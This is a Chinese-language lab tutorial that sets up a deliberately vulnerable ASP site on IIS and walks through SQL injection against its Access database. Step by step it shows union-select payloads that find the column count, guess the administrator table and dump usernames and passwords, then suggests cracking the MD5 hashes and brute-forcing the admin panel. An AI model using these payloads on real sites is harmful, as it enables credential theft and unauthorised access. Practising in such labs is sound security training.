下载地址:https://pan.baidu.com/s/1y6Gkvo7Wsbwj_zNbaBiCmA 提取码: kjg7
1.环境搭建
启动iis服务器 并浏览根⽬录 将压缩包解压到根⽬录下⾯,这个压缩包是我们需要搭建⽹站的压缩包,将这个压缩包解压到⽹站根⽬录下,获得⼀堆⽂件夹 我们环境所需要的是1111⽂件夹 将1111⽂件夹⾥⾯的所有东⻄放到根⽬录下⾯,最终如下图
2.
access注⼊实战
步骤⼀:
打开⽹⻚判断是否存在注⼊
?id=14' // 报错?id=14 and 1=1 // 正常?id=14 and 1=2 // 错误
步骤⼆:order by判断列数 当order by 7的时候⻚⾯正常 order by 8的时候⻚⾯报错 说明有7个字段
id=14 order by 7 // ⻚⾯正常id=14 order by 8 // ⻚⾯报错。说明有 7 列
步骤三:猜表
?id=14 and exists(select * from administrator) // 从 administrator 表中查询数据,⻚⾯正常,说明查到数据了
步骤四:判断回显位置
?id=14 union select 1,2,3,4,5,6,7 // ⻚⾯报错,不符合 access 语法, select 列 from 表?id=14 union select 1,2,3,4,5,6,7 from administrator // ⻚⾯正常
步骤五:猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd
pass_word admin_name admin_username admin_user admin_passwd admin_pwd ...........
news_view.asp?id=14 union select 1,user_name,3,4,5,6,7 from administrator // 正常,说明存在这⼀列news_view.asp?id=14 union select 1,user_name,password,4,5,6,7 from administrator // 成功查到密码
步骤六:密码进⾏md5解密 并去后台登录 后台地址爆破⼀下